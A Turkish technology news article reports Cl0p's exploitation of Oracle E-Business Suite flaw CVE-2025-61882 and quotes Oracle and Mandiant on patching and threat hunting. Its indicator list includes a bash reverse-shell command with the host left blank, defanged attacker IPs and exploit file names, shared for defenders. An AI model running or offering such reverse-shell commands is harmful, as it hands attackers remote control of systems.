Cl0p hacker grubu Oracle E-Business Suite'i vurdu! - Technopat
Sonuç bulunamadı
Bütün Sonuçları Göster
Teknoloji tutkunu Technopatların ortak adresi: Technopat.net
  • Haber
  • Yapay Zeka
  • Tavsiyeler
  • Oyun
  • Video
  • Teknoloji
    • Mobil
    • Nasıl Yapılır
    • Yazılım
    • Elektronik Alışveriş Fırsatları
    • Pratik
    • Ev Teknolojileri
    • Makale
    • Güvenlik
    • Ekonomi
    • İnternet
    • Giyilebilir Teknoloji
    • Sağlık
    • Yazıcı
    • Sosyal Medya
    • Otomobil
      • Elektrikli Otomobil
  • Sosyal
Teknoloji tutkunu Technopatların ortak adresi: Technopat.net
  • Haber
  • Yapay Zeka
  • Tavsiyeler
  • Oyun
  • Video
  • Teknoloji
    • Mobil
    • Nasıl Yapılır
    • Yazılım
    • Elektronik Alışveriş Fırsatları
    • Pratik
    • Ev Teknolojileri
    • Makale
    • Güvenlik
    • Ekonomi
    • İnternet
    • Giyilebilir Teknoloji
    • Sağlık
    • Yazıcı
    • Sosyal Medya
    • Otomobil
      • Elektrikli Otomobil
  • Sosyal
Sonuç bulunamadı
Bütün Sonuçları Göster
Teknoloji tutkunu Technopatların ortak adresi: Technopat.net

Anasayfa - Güvenlik - Cl0p hacker grubu Oracle E-Business Suite’i vurdu!

Cl0p hacker grubu Oracle E-Business Suite’i vurdu!

6 Ekim 2025 - 17:00
- Güvenlik, Haber, Teknoloji

Oracle, E-Business Suite’inde tespit edilen ve Cl0p siber suç grubu tarafından veri hırsızlığı saldırılarında aktif olarak kullanılan kritik güvenlik açığı için acil güncelleme yayınladı. CVE-2025-61882 kodu ile takip edilen bu açık, şirketlerin hassas verilerini ciddi risk altına sokuyor.

Kritik güvenlik açığının detayları

CVE-2025-61882 güvenlik açığı, 9.8 CVSS puanıyla kritik seviyede değerlendiriliyor. Açık, Oracle Concurrent Processing bileşeninde bulunuyor ve kimlik doğrulaması yapılmamış bir saldırganın HTTP üzerinden ağ erişimi ile sistemi ele geçirmesine olanak tanıyor.

Oracle’ın yayınladığı güvenlik bülteninde, “Bu güvenlik açığı kimlik doğrulaması olmadan uzaktan istismar edilebilir, yani kullanıcı adı ve şifreye ihtiyaç olmadan ağ üzerinden kullanılabilir. Başarıyla istismar edilirse, bu güvenlik açığı uzaktan kod yürütme ile sonuçlanabilir” açıklaması yer alıyor. Oracle’ın Güvenlik Müdürü Rob Duhart, ayrı bir uyarıda şirketin CVE-2025-61882 için yamalar yayınladığını ve “soruşturmamız sırasında keşfedilen ek potansiyel istismar olasılıklarına karşı güncellemeler sağladıklarını” belirtti.

Saldırı indikatörleri ve Scattered LAPSUS$ Hunters bağlantısı

Oracle, tehlike göstergeleri (IoC) olarak aşağıdaki IP adreslerini ve artefaktları paylaştı. Bu göstergeler, saldırılarda Scattered LAPSUS$ Hunters grubunun da muhtemel katılımına işaret ediyor:

  • 200.107.207[.]26 (Potansiyel GET ve POST aktivitesi)
  • 185.181.60[.]11 (Potansiyel GET ve POST aktivitesi)
  • sh -c /bin/bash -i >& /dev/tcp// 0>&1 (Belirli bir port üzerinden giden TCP bağlantısı kurma)
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
  • oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Bu dosya isimleri ve komutlar, saldırganların sisteme sızmak ve kontrol sağlamak için kullandıkları araçları gösteriyor.

Oracle zero-day haberi, Cl0p ransomware grubunun Oracle E-Business Suite’i hedef alan yeni kampanyasına ilişkin raporların ortaya çıkmasından günler sonra geldi. Google’a ait Mandiant, devam eden aktiviteyi yüzlerce ele geçirilmiş hesaptan başlatılan “yüksek hacimli e-posta kampanyası” olarak tanımladı.

Google Cloud’da Mandiant CTO’su Charles Carmakal, LinkedIn’de paylaştığı gönderide şu açıklamalarda bulundu: “Cl0p, Oracle EBS’de birçok zafiyet sömürdü ve bu sayede Ağustos 2025’te birkaç kurbandan büyük miktarda veri çaldı. Oracle’ın Temmuz 2025 güncellemesinde yamalanan zafiyetlerin yanı sıra bu hafta sonu yamalanan CVE-2025-61882 dahil olmak üzere birden fazla zafiyet kullanıldı.”

Carmakal’ın uyarısı oldukça net: “Halihazırda gerçekleşmiş olan geniş çaplı zero-day istismarını (ve diğer aktörler tarafından muhtemelen devam edecek n-day istismarını) göz önünde bulundurarak, yamanın ne zaman uygulandığına bakılmaksızın, kuruluşlar zaten ele geçirilip geçirilmediklerini incelemelidir.” Bu uyarı, sadece güncelleme yapmanın yeterli olmadığını, kurumların geçmişe dönük olarak sistemlerini kontrol etmeleri gerektiğini vurguluyor. Saldırganlar, açığın yamalanmasından önce sistemlere sızmış ve kalıcı erişim sağlamış olabilir.

Raporlara göre, saldırı kampanyası yüksek hacimli ve koordineli bir şekilde yürütülüyor. Yüzlerce ele geçirilmiş hesabın kullanılması, saldırganların geniş bir ağa sahip olduğunu ve birçok kurumu aynı anda hedefleyebildiğini gösteriyor. Oracle E-Business Suite’in kurumsal dünyada yaygın kullanımı düşünüldüğünde, potansiyel etki alanı oldukça geniş.

Cl0p grubu, geçmişte de büyük ölçekli veri hırsızlığı kampanyalarıyla tanınıyor. Grubun bu yeni kampanyada hem eski hem de yeni güvenlik açıklarını birleştirerek kullanması, saldırı stratejilerinin geliştiğini gösteriyor.

Oracle’ın acil yamasını derhal uygulamak kritik önem taşıyor. Ancak Mandiant uzmanlarının da belirttiği gibi, yamayı uygulamak tek başına yeterli değil. Kurumların ayrıca:

  • Sistem loglarını geriye dönük olarak incelemesi
  • Paylaşılan IoC’leri kullanarak tehdit avı yapması
  • Ağ trafiğinde anormal aktiviteleri kontrol etmesi
  • E-Business Suite erişim kontrollerini gözden geçirmesi gerekiyor

Bu olay, kurumsal güvenlikte proaktif yaklaşımın ve sürekli izlemenin önemini bir kez daha ortaya koyuyor. Zero-day açıkların hızla weaponize edildiği günümüzde, güvenlik yamalarının zamanında uygulanması ve sistem güvenliğinin sürekli izlenmesi hayati önem taşıyor.

Etiketler: cl0pCVE-2025-61882Oracle
PaylaşPaylaşTweetYollaPaylaş
Berkan Aslan

Berkan Aslan

Technopat.Net Haber Editörü

Yorum Yap Yanıtı iptal et

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

RSS Technopat Sosyal

  • İndirme hızını en az 3 kat artırmak
  • Berber değiştirirken eski berbere ne denilmeli?
  • Bildirimleri bilgisayara gelmiyor
  • A56 alınır mı?
  • 6.500 TL'ye kadar %65 veya %75 klavye önerisi
  • 12 bin TL'ye AM5 anakart önerisi
  • Müzik dinlemek neden hoşumuza gider?
  • Windows 8.1'de olan Bluetooth kod 43 hatası nasıl çözülür?
  • Saç pudrası önerisi
  • Acer Nitro 16 laptop şarja takmadan açılmıyor

Technopat Video

Teknoloji tutkunu Technopatların ortak adresi: Technopat.net!

Güncel teknoloji, internet, donanım, yazılım, oyun ve daha fazlası haber, makale ve videolar ile Technopat’ta sizlerle.

01010100 01100101 01100011 01101000 01101110 01101111 01110000 01100001 01110100

Kategoriler

  • Yapay Zeka
  • Ev Teknolojileri
  • Makale
  • Video

Sosyal Medya

Bağlantılar

  • Hakkında
  • Haber
  • Video
  • Sosyal
  • Çerez Politikası
© 2011-2025 Technopat. Tüm Hakları Saklıdır.

Hosting :

Çerez Onayı
Web sitemizi ziyaret ettiğinizde, kullanıcı deneyiminizi daha iyi hale getirmek, hizmetlerimizi size daha etkin bir şekilde sunabilmek için çerezler (cookies) ve benzeri araçlar kullanıyoruz. Çerezler, internet sitesinin düzgün çalışmasını sağlamak, içeriği kişiselleştirmek, sosyal medya özellikleri sağlamak ve trafik analizi yapmak için kullanılan küçük metin dosyalarıdır. Çerezleri nasıl kullandığımız ve kişisel verilerinizi nasıl işlediğimiz hakkında daha fazla bilgi almak için çerez politikamızı ve kişisel veri politikamızı inceleyebilirsiniz.
Fonksiyonel Her zaman aktif
Teknik depolama veya erişim, sadece kullanıcının açıkça talep ettiği belirli bir hizmetin kullanılmasını sağlama amacıyla veya iletişimin elektronik iletişim ağı üzerinden iletilmesinin tek amacıyla yasal olarak kesinlikle gereklidir.
Tercihler
Teknik depolama veya erişim, abone veya kullanıcı tarafından istenmeyen tercihlerin depolanması yasal amacıyla gereklidir.
İstatistikler
Sadece istatistiksel amaçlarla kullanılan teknik depolama veya erişim. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.
Pazarlama
Teknik depolama veya erişim, reklam gönderimi için kullanıcı profilleri oluşturmak veya kullanıcıyı bir web sitesinde veya birden fazla web sitesinde benzer pazarlama amaçları için takip etmek amacıyla gereklidir.
  • Seçenekleri yönet
  • Hizmetleri yönetin
  • {vendor_count} satıcılarını yönetin
  • Bu amaçlar hakkında daha fazla bilgi edinin
Tercihleri yönet
  • {title}
  • {title}
  • {title}
Sonuç bulunamadı
Bütün Sonuçları Göster
  • Giriş
  • Teknoloji Haberleri
  • Sosyal
  • Nasıl Yapılır
  • Yapay Zeka
  • Video
  • Tavsiyeler
  • İncelemeler
    • Video İncelemeler
  • Güvenlik
  • Oyun
  • Makale
    • Pratik
    • Yazar Köşeleri

© 2025 Technopat
Sorularınız için Technopat Sosyal